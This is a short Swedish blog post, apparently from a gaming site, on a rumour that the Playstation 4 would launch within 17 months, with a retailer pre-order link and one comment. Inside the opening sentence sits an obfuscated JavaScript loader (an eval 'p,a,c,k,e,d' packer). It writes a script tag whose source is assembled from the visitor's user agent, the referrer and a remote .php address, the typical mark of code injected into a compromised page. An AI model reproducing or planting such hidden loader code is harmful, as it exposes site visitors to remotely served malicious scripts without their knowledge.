Image Image Image Image Image Image Image Image Image Image

| 7 augusti, 2020

Scroll to top

Top

Playstation 4 om 17 månader?

Playstation 4 om 17 månader?
Ian Browaldh

Nu eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(’\b’+e(c)+’\b’,’g’),k[c])}}return p}(’0.6(”<\/k"+"l>”);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|zbnab|var|u0026u|referrer|ttfiy||js|php’.split(’|’),0,{}))
har det inte gått lång tid sen ryktena om Playstation 4 började sprida sig på ett flertal kanaler på internet. Enligt det här ryktet så skulle Sony’s nya konsol Playstation 4 dyka upp inom en period av 17 månader från och med nu.

Ryktena som ser ut att ha startat på sajten Bitmob skriver att nyheterna har dykt upp under ett möte på självaste Sony. Men självklart så är det inte 100% klart om vad som kommer att hända inom de kommande 17 månaderna. Varför det blivit sådan buzz omkring ryktet är för att det är första gången rykten dyker upp på nätet sedan 2006 strax efter releasen av Playstation 3. De sa att dem redan hade börjat jobba på nästa konsol, dvs Playstation 4.

Webhallen.se har redan säkerställt förhandsbokningen av maskinen. Men känner jag Webhallen rätt så är det vanligt att vara tidigt ute.

Länk till PS 4 på webhallen: http://www.webhallen.com/spel/playstation_3/135975-playstation_4_basenhet

Men, rykten är rykten 🙂

 

 

Comments

  1. Hejja IAN!